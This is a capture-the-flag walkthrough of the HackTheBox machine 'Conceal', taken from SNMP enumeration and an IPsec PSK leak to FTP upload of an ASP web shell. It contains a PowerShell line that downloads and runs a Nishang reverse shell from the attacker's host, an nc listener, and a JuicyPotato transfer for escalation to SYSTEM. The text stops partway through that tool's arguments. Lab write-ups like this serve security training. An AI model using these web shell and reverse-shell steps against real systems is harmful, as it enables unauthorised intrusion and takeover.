Conceal

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.116

All 1000 scanned ports on 10.10.10.116 are in ignored states.


┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.116  

161/udp open  snmp
500/udp open  isakmp

OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device

Two UDP ports are open:

  • Port 161: SNMP

  • Port 500: ISAKMP

(The OS fingerprint above is not worth much with no open TCP ports to probe; the SNMP data below is far more reliable.)

A quick Google search tells us that ISAKMP is the Internet Security Association and Key Management Protocol, commonly referred to as Internet Key Exchange (IKE). Most of the documentation is about configuring IPsec and ISAKMP to build VPNs.

So there are probably other ports open on this host, but we won't be able to see them until we establish that VPN connection. In order to do that we need a key for authentication, and since this is an HTB box, that key has to be discoverable somewhere. The obvious place to look is the other open port, SNMP.

Enumeration:

Port 161/udp is SNMP. Let's run nmap's default SNMP scripts against it.

┌──(kali💀kali)-[~]
└─$ sudo nmap -p 161 -sU -sC -sV 10.10.10.116

-p: port
-sU: UDP scan
-sC: run default scripts
-sV: version detection

161/udp open  snmp    SNMPv1 server (public)
| snmp-win32-users: 
|   Administrator
|   DefaultAccount
|   Destitute
|_  Guest
| snmp-processes: 
|   1: 
|     Name: System Idle Process
|   4: 
|     Name: System
|   292: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalServiceNoNetwork
|   304: 
|     Name: smss.exe
|   372: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalService
|   388: 
|     Name: csrss.exe
|   468: 
|     Name: wininit.exe
|   476: 
|     Name: csrss.exe
|   536: 
|     Name: winlogon.exe
|   612: 
|     Name: services.exe
|   620: 
|     Name: lsass.exe
|     Path: C:\Windows\system32\
|   708: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k DcomLaunch
|   728: 
|     Name: fontdrvhost.exe
|   732: 
|     Name: fontdrvhost.exe
|   816: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k RPCSS
|   908: 
|     Name: vmacthlp.exe
|     Path: C:\Program Files\VMware\VMware Tools\
|   916: 
|     Name: dwm.exe
|   956: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalServiceNetworkRestricted
|   976: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalSystemNetworkRestricted
|   1040: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k netsvcs
|   1068: 
|     Name: SearchIndexer.exe
|     Path: C:\Windows\system32\
|     Params: /Embedding
|   1076: 
|     Name: Memory Compression
|   1088: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k NetworkService
|   1216: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalServiceNetworkRestricted
|   1296: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalServiceNetworkRestricted
|   1308: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalServiceNetworkRestricted
|   1480: 
|     Name: spoolsv.exe
|     Path: C:\Windows\System32\
|   1624: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k appmodel
|   1740: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k apphost
|   1756: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k utcsvc
|   1780: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k ftpsvc
|   1812: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalSystemNetworkRestricted
|   1820: 
|     Name: SecurityHealthService.exe
|   1844: 
|     Name: snmp.exe
|     Path: C:\Windows\System32\
|   1884: 
|     Name: VGAuthService.exe
|     Path: C:\Program Files\VMware\VMware Tools\VMware VGAuth\
|   1896: 
|     Name: vmtoolsd.exe
|     Path: C:\Program Files\VMware\VMware Tools\
|   1904: 
|     Name: ManagementAgentHost.exe
|     Path: C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\
|   1916: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k iissvcs
|   1992: 
|     Name: LogonUI.exe
|     Params:  /flags:0x0 /state0:0xa39c8855 /state1:0x41c64e6d
|   2004: 
|     Name: SearchProtocolHost.exe
|     Path: C:\Windows\system32\
|     Params:  Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozil
|   2032: 
|     Name: MsMpEng.exe
|   2480: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k NetworkServiceNetworkRestricted
|   2732: 
|     Name: msdtc.exe
|     Path: C:\Windows\System32\
|   2740: 
|     Name: WmiPrvSE.exe
|     Path: C:\Windows\system32\wbem\
|   2744: 
|     Name: WmiPrvSE.exe
|     Path: C:\Windows\system32\wbem\
|   2780: 
|     Name: svchost.exe
|   2916: 
|     Name: MpCmdRun.exe
|     Path: C:\Program Files\Windows Defender\
|     Params:  Scan -ScheduleJob -ScanTrigger 55
|   3016: 
|     Name: conhost.exe
|     Path: \??\C:\Windows\system32\
|     Params: 0x4
|   3044: 
|     Name: dllhost.exe
|     Path: C:\Windows\system32\
|     Params: /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
|   3424: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalServiceAndNoImpersonation
|   3544: 
|     Name: NisSrv.exe
|   4760: 
|     Name: MpCmdRun.exe
|     Path: C:\Program Files\Windows Defender\
|     Params:  Scan -ScheduleJob -RestrictPrivileges -ScanType 1 -ScanTrigger 59 -Reinvoke
|   4772: 
|     Name: SearchFilterHost.exe
|     Path: C:\Windows\system32\
|_    Params:  0 700 704 712 8192 708 
| snmp-win32-software: 
|   Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161; 2021-03-17T15:16:36
|   Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161; 2021-03-17T15:16:36
|_  VMware Tools; 2021-03-17T15:16:36
| snmp-netstat: 
|   TCP  0.0.0.0:21           0.0.0.0:0
|   TCP  0.0.0.0:80           0.0.0.0:0
|   TCP  0.0.0.0:135          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   TCP  0.0.0.0:49664        0.0.0.0:0
|   TCP  0.0.0.0:49665        0.0.0.0:0
|   TCP  0.0.0.0:49666        0.0.0.0:0
|   TCP  0.0.0.0:49667        0.0.0.0:0
|   TCP  0.0.0.0:49668        0.0.0.0:0
|   TCP  0.0.0.0:49669        0.0.0.0:0
|   TCP  0.0.0.0:49670        0.0.0.0:0
|   TCP  10.10.10.116:139     0.0.0.0:0
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:500          *:*
|   UDP  0.0.0.0:4500         *:*
|   UDP  0.0.0.0:5050         *:*
|   UDP  0.0.0.0:5353         *:*
|   UDP  0.0.0.0:5355         *:*
|   UDP  10.10.10.116:137     *:*
|   UDP  10.10.10.116:138     *:*
|   UDP  10.10.10.116:1900    *:*
|   UDP  10.10.10.116:57172   *:*
|   UDP  127.0.0.1:1900       *:*
|_  UDP  127.0.0.1:57173      *:*
| snmp-win32-services: 
|   Application Host Helper Service
|   Background Intelligent Transfer Service
|   Background Tasks Infrastructure Service
|   Base Filtering Engine
|   CNG Key Isolation
|   COM+ Event System
|   COM+ System Application
|   Client License Service (ClipSVC)
|   Connected Devices Platform Service
|   Connected User Experiences and Telemetry
|   CoreMessaging
|   Cryptographic Services
|   DCOM Server Process Launcher
|   DHCP Client
|   DNS Client
|   Data Sharing Service
|   Data Usage
|   Device Setup Manager
|   Diagnostic Policy Service
|   Diagnostic Service Host
|   Diagnostic System Host
|   Distributed Link Tracking Client
|   Distributed Transaction Coordinator
|   Geolocation Service
|   Group Policy Client
|   IKE and AuthIP IPsec Keying Modules
|   IP Helper
|   IPsec Policy Agent
|   Local Session Manager
|   Microsoft FTP Service
|   Network Connection Broker
|   Network List Service
|   Network Location Awareness
|   Network Store Interface Service
|   Plug and Play
|   Power
|   Print Spooler
|   Program Compatibility Assistant Service
|   RPC Endpoint Mapper
|   Remote Procedure Call (RPC)
|   SNMP Service
|   SSDP Discovery
|   Security Accounts Manager
|   Security Center
|   Server
|   Shell Hardware Detection
|   State Repository Service
|   Storage Service
|   Superfetch
|   System Event Notification Service
|   System Events Broker
|   TCP/IP NetBIOS Helper
|   Task Scheduler
|   Themes
|   Tile Data model server
|   Time Broker
|   TokenBroker
|   User Manager
|   User Profile Service
|   VMware Alias Manager and Ticket Service
|   VMware CAF Management Agent Service
|   VMware Physical Disk Helper Service
|   VMware Tools
|   WinHTTP Web Proxy Auto-Discovery Service
|   Windows Audio
|   Windows Audio Endpoint Builder
|   Windows Connection Manager
|   Windows Defender Antivirus Network Inspection Service
|   Windows Defender Antivirus Service
|   Windows Defender Security Centre Service
|   Windows Driver Foundation - User-mode Driver Framework
|   Windows Event Log
|   Windows Firewall
|   Windows Font Cache Service
|   Windows Management Instrumentation
|   Windows Process Activation Service
|   Windows Push Notifications System Service
|   Windows Search
|   Windows Time
|   Windows Update
|   Workstation
|_  World Wide Web Publishing Service
| snmp-sysdescr: Hardware: Intel64 Family 6 Model 85 Stepping 7 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
|_  System uptime: 19m24.38s (116438 timeticks)
| snmp-interfaces: 
|   Software Loopback Interface 1\x00
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 1 Gbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   vmxnet3 Ethernet Adapter\x00
|     IP address: 10.10.10.116  Netmask: 255.255.255.0
|     MAC address: 00:50:56:b9:04:91 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|     Traffic stats: 105.59 Kb sent, 470.93 Kb received
|   vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter-0000\x00
|     MAC address: 00:50:56:b9:04:91 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|     Traffic stats: 105.59 Kb sent, 470.93 Kb received
|   vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000\x00
|     MAC address: 00:50:56:b9:04:91 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|     Traffic stats: 105.59 Kb sent, 470.93 Kb received
|   vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-0000\x00
|     MAC address: 00:50:56:b9:04:91 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 105.59 Kb sent, 470.93 Kb received
Service Info: Host: Conceal

The service is SNMP version 1 and nmap could query it with the default "public" community string, which is the only authentication SNMPv1 has. The snmp-netstat output lists what the host is actually listening on: TCP 21 (FTP), 80 (HTTP), 135/139/445 (RPC and SMB), plus UDP 4500 (IKE NAT-T). None of those TCP ports answered our scan, so the host's IPsec policy presumably requires an established security association before it will talk TCP to us.

For now, we can only interact with the SNMP and ISAKMP ports. Let’s first query SNMP for any sensitive information.

SNMP - UDP 161

Knowing that snmp is open, I’ll use snmpwalk with the standard parameters:

┌──(kali💀kali)-[~]
└─$ snmpwalk -c public -v 1 10.10.10.116
-c: community string
-v: SNMP version

iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: Intel64 Family 6 Model 85 Stepping 7 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (163448) 0:27:14.48
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""

The sysContact object (1.3.6.1.2.1.1.4.0) leaks what the admin labelled as the IKE VPN PSK, stored as a hash!
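Before cracking it, it is worth seeing exactly how little the leak cost. The block below is an added example (my own code, not from the original write-up or from snmpwalk/nmap) that builds the same SNMPv1 GetRequest snmpwalk sends for sysContact and parses the GetResponse. The reply it parses is fabricated inline from the value seen above so the script runs offline; snmp_get() sends the identical packet to a live agent. What it demonstrates: the only "authentication" in the packet is the community string, sent in cleartext, so anyone who can guess public reads the object.

```python
import socket

# BER tags used by SNMPv1 (RFC 1157)
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2

# Value observed in the snmpwalk output above; used only to fabricate an offline reply.
SYSCONTACT_OID = "1.3.6.1.2.1.1.4.0"
SYSCONTACT = "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"


def _len(n):
    """BER length: short form below 128, else 0x8N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, value):
    return bytes([tag]) + _len(len(value)) + value


def _int(n):
    return _tlv(INTEGER, n.to_bytes((n.bit_length() + 8) // 8, "big", signed=True))


def _oid(dotted):
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])          # first two arcs share one byte
    for arc in arcs[2:]:                                # base-128, high bit = more follows
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return _tlv(OID, bytes(out))


def _message(community, pdu_tag, request_id, oid, value_tlv):
    varbind = _tlv(SEQUENCE, _oid(oid) + value_tlv)
    pdu = _tlv(pdu_tag, _int(request_id) + _int(0) + _int(0) + _tlv(SEQUENCE, varbind))
    # version 0 == SNMPv1; the cleartext community string is the whole "authentication"
    return _tlv(SEQUENCE, _int(0) + _tlv(OCTET_STRING, community.encode()) + pdu)


def build_get_request(community, oid, request_id=1):
    return _message(community, GET_REQUEST, request_id, oid, _tlv(NULL, b""))


def build_get_response(community, oid, value, request_id=1):
    """Fabricated agent reply so the example runs with no agent on the wire."""
    return _message(community, GET_RESPONSE, request_id, oid, _tlv(OCTET_STRING, value.encode()))


def _read_tlv(buf, pos=0):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                   # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(raw):
    arcs, acc = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def parse_message(buf):
    tag, body, _ = _read_tlv(buf)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    _, ver, p = _read_tlv(body)
    _, comm, p = _read_tlv(body, p)
    pdu_tag, pdu, _ = _read_tlv(body, p)
    _, rid, p = _read_tlv(pdu)
    _, err, p = _read_tlv(pdu, p)
    _, _, p = _read_tlv(pdu, p)                         # error-index, unused here
    _, vbl, _ = _read_tlv(pdu, p)
    varbinds, p = [], 0
    while p < len(vbl):
        _, vb, p = _read_tlv(vbl, p)
        _, oid_raw, q = _read_tlv(vb)
        vt, val, _ = _read_tlv(vb, q)
        if vt == OCTET_STRING:
            value = val.decode("utf-8", "replace")
        elif vt == INTEGER:
            value = int.from_bytes(val, "big", signed=True)
        else:
            value = None if vt == NULL else val
        varbinds.append((_decode_oid(oid_raw), value))
    return {"version": int.from_bytes(ver, "big"), "community": comm.decode(),
            "pdu": "GetResponse" if pdu_tag == GET_RESPONSE else hex(pdu_tag),
            "request_id": int.from_bytes(rid, "big", signed=True),
            "error_status": int.from_bytes(err, "big"), "varbinds": varbinds}


def snmp_get(host, community, oid, timeout=2.0):
    """Live use only: one GetRequest to UDP/161, reply parsed."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community, oid, request_id=0x1234), (host, 161))
        data, _ = s.recvfrom(65535)
    return parse_message(data)


if __name__ == "__main__":
    print("request :", build_get_request("public", SYSCONTACT_OID).hex())
    reply = build_get_response("public", SYSCONTACT_OID, SYSCONTACT)
    print("parsed  :", parse_message(reply)["varbinds"])
```

Against the box you would call snmp_get("10.10.10.116", "public", SYSCONTACT_OID); the request bytes it emits are what a packet capture of snmpwalk shows, community string and all.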

┌──(kali💀kali)-[~]
└─$ echo -n 9C8B1A372B1878851BE2C097031B6E43 | wc -c
32

32 hex characters is a 128-bit digest, which fits MD5 but equally fits NTLM (the NT hash: MD4 over the UTF-16LE password), so the length alone doesn't identify the algorithm. An online hash lookup returns a match as NTLM:

Hash                              Type  Result
9C8B1A372B1878851BE2C097031B6E43  NTLM  Dudecake1!

IKE - UDP 500

UDP 500 is Internet Key Exchange (IKE), the protocol that negotiates the security associations for an IPsec VPN. Now that we have a candidate PSK, we need to know which IKE version, proposal (cipher, hash, DH group) and authentication method the host expects before we can configure a client. ike-scan does that recon:

┌──(kali💀kali)-[~]
└─$ ike-scan -M 10.10.10.116
-M: multiline

Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116    Main Mode Handshake returned
        HDR=(CKY-R=4d449538a79aa636)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
        VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
        VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
        VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
        VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
        VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
        VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Things I take from that:

  • The phase 1 proposal is 3DES encryption, SHA1 integrity and DH group 2 (modp1024).

  • Auth is Pre-Shared Key (PSK), which matches the SNMP leak.

  • This is IKEv1 (ike-scan's default probe is an IKEv1 Main Mode exchange, and the host answered it with a Main Mode handshake).

Connecting to IPSEC VPN

Install strongswan

Next, we'll use strongSwan to establish the IPsec connection. It isn't preinstalled on Kali; install it with:

┌──(kali💀kali)-[~]
└─$ sudo apt-get install strongswan     

Build Config Files

We have to make changes to two files:

  • ipsec.secrets

  • ipsec.conf

In the /etc/ipsec.secrets, add the following entry.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/ipsec.secrets  
# This file holds shared secrets or RSA private keys for authentication.

10.10.14.3 10.10.10.116 : PSK "Dudecake1!"

In the /etc/ipsec.conf, add the following entry.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/ipsec.conf  
# ipsec.conf - strongSwan IPsec configuration file

config setup
    charondebug="all"
    uniqueids=yes
    strictcrlpolicy=no

conn conceal
    authby=secret
    auto=add
    ike=3des-sha1-modp1024!
    esp=3des-sha1!
    type=transport
    keyexchange=ikev1
    left=10.10.14.3
    right=10.10.10.116
    rightsubnet=10.10.10.116[tcp]

  • charondebug="all" - be more verbose to help me troubleshoot the connection.

  • authby=secret - use PSK auth, with the secret looked up in ipsec.secrets.

  • ike, esp, and keyexchange are set based on information from ike-scan. The trailing ! tells strongSwan to offer exactly this proposal and not append its defaults.

  • left and right represent my computer and the target computer.

  • type=transport - use IPsec transport mode to connect host to host (no tunnel subnets).

  • rightsubnet=10.10.10.116[tcp] - only TCP to the target goes through IPsec; UDP (SNMP, and IKE itself) stays outside it. The older equivalent is rightprotoport=tcp.

  • auto=add - load the connection when the daemon starts but don't bring it up until we run ipsec up.

Then run the following command to establish the connection.

┌──(kali💀kali)-[~]
└─$ sudo ipsec restart   

┌──(kali💀kali)-[~]
└─$ sudo ipsec up conceal

connection 'conceal' established successfully

With the VPN connected, I can start recon over again and see a lot more.

NMAP: With the security association up, nmap shows more ports, clearly a Windows host, matching what I saw in SNMP. Note the -sT: nmap's default SYN scan writes raw frames that bypass the kernel's IPsec transform, so those probes leave unencrypted and the host ignores them. A connect scan uses ordinary sockets, so its packets match the policy and get ESP-encapsulated.

┌──(kali💀kali)-[~]
└─$ sudo nmap -sT 10.10.10.116 

21/tcp  open  ftp
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -sT 10.10.10.116

21/tcp  open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -4s
| smb2-time: 
|   date: 2023-12-20T02:07:12
|_  start_date: 2023-12-20T00:07:14

Enumeration:

Port 80 HTTP

I always start off with enumerating HTTP. Visit the application in the browser.

http://10.10.10.116/

We get the default IIS welcome page. The page source doesn't contain anything of interest. Next, run gobuster to enumerate directories and files, asking for the extensions IIS is likely to serve:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,aspx,asp,html

/upload               (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]

Directory listing is on, but no files:

http://10.10.10.116/upload/

Port 21 FTP

The nmap scan showed anonymous login is allowed.

┌──(kali💀kali)-[~]
└─$ ftp 10.10.10.116

Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.

Let's test whether we're allowed to upload files. Create a test.txt file on the attack machine.

┌──(kali💀kali)-[~/Desktop]
└─$ echo "hello" > test.txt

Upload it to the FTP server, confirm it's listed, then clean up.

ftp> put test.txt

ftp> ls
12-20-23  02:23AM                    7 test.txt

ftp> del test.txt
250 DELE command successful.

Anonymous write works. One caveat: the box runs a cleanup job and uploaded files disappear on their own after a few minutes, so anything we rely on has to be used quickly after uploading.

Perfect! According to the nmap scan, this is IIS 10, so it should be able to execute ASP and ASPX code, and the FTP root appears to map to the /upload directory we found with gobuster. Let's test that on the web server.

Create a test.aspx file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.

┌──(kali💀kali)-[~/Desktop]
└─$ nano test.aspx 

ftp> put test.aspx

HTTP Error 404.3 - Not Found

404.3 is IIS saying that no handler mapping exists for the requested extension: the ASP.NET handler for .aspx isn't installed on this server, so ASPX files won't execute. Next, let's try a classic ASP file.

Create a test.asp file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.

Perfect, it does execute ASP code! We’ll use this to gain an initial foothold on the system.

Foothold:

Create a cmd.asp file on the attack machine that contains the following simple web shell.

┌──(kali💀kali)-[~/Desktop]
└─$ nano cmd.asp 

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

The above code executes the whoami command and outputs it on the screen. Upload the cmd.asp file on the FTP server and view it on the browser.

ftp> put cmd.asp

http://10.10.10.116/upload/cmd.asp

conceal\destitute

We have code execution!

Nishang Shell

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory as PowerShellTcp.ps1 (the name used in the download URL below). Append the following line to the end of the script so that the function runs as soon as the script is loaded:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 1234

When called, this sends a reverse shell back to our attack machine on port 1234. Set up a listener to receive it.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234

Next, change the cmd.asp file to download the PowerShell script and execute it.

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.3:5555/PowerShellTcp.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Start up a Python web server in the directory that the shell script resides in. (Exec followed by StdOut.ReadAll blocks until the PowerShell child exits, so the browser request to cmd.asp will hang for as long as the reverse shell lives; that's expected.)

┌──(kali💀kali)-[~]
└─$ python3 -m http.server 5555

Upload the cmd.asp file on the FTP server and view it on the browser. We get a shell! Grab the user.txt flag.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.116] 49691
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute

PS C:\Users\Destitute\Desktop> type user.txt
6462ff-----------------------------

Privilege Escalation:

Run the systeminfo command.

PS C:\Users\Destitute\Desktop> systeminfo

Host Name:                 CONCEAL
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.15063 N/A Build 15063
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00329-00000-00003-AA343
Original Install Date:     12/10/2018, 20:04:27
System Boot Time:          20/12/2023, 00:07:00
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,179 MB
Virtual Memory: Max Size:  3,199 MB
Virtual Memory: Available: 2,268 MB
Virtual Memory: In Use:    931 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.116
                                 [02]: fe80::89cd:a60b:b146:f16a
                                 [03]: dead:beef::ad98:3e35:719b:6661
                                 [04]: dead:beef::89cd:a60b:b146:f16a
                                 [05]: dead:beef::24b
Hyper-V Requirements:      A hypervisor has been detected. 

We're on Windows 10 Enterprise, 64-bit, build 15063 (version 1703) with no hotfixes listed. Let's first check the system privileges that are enabled for this user.

PS C:\Users\Destitute\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

SeImpersonatePrivilege is enabled, so we're very likely to get SYSTEM using Juicy Potato. Accounts running the SQL Server service or IIS application pools usually have this privilege by design: it lets a service impersonate a client after the client has authenticated to it. Juicy Potato abuses exactly that. It asks DCOM to activate a COM server (chosen by CLSID) that runs as SYSTEM, points the activation at a local RPC endpoint it controls so the SYSTEM service authenticates to it, and then uses SeImpersonatePrivilege to turn the resulting token into a new process via CreateProcessWithTokenW or CreateProcessAsUser. The technique works on Windows 7 through Windows 10 1803 and Server 2008 through Server 2016; Microsoft broke it in Windows 10 1809 / Server 2019, so build 15063 is in range.

Let’s test it out. Grab the Juicy Potato executable and transfer it to the target machine using the following command.

PS C:\Users\Destitute\Desktop> (new-object net.webclient).downloadfile('http://10.10.14.3:5555/JuicyPotato.exe', 'C:\Users\Destitute\Desktop\jp.exe')

Run the executable file to view the arguments it takes.

PS C:\Users\Destitute\Desktop> ./jp.exe
JuicyPotato v0.1 

Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port

Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

It requires 3 mandatory arguments:

  • -t: create process call. We'll use * to try both.

